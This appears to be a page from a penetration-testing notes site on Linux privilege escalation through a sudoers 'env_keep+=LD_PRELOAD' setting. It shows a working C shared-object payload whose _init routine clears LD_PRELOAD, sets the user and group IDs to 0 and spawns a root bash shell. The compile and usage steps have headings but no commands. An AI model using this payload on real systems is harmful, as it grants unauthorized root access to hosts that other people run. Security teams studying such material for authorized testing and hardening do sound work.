search
githubEdit

LD_PRELOAD

hashtag
Example

hashtag
True positive:

env_keep+=LD_PRELOAD

hashtag
1: Check for LD_PRELOAD

hashtag
2: Write a simple C code compiled as a share object file (.so extension)

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/bash");
}

hashtag
3: Run the program with sudo privileges and the LD_PRELOAD option pointing to our .so file

hashtag
1) Compilation

hashtag
2) Usage:

PreviousKernel ExploitsNextLXC-LXD Group

Last updated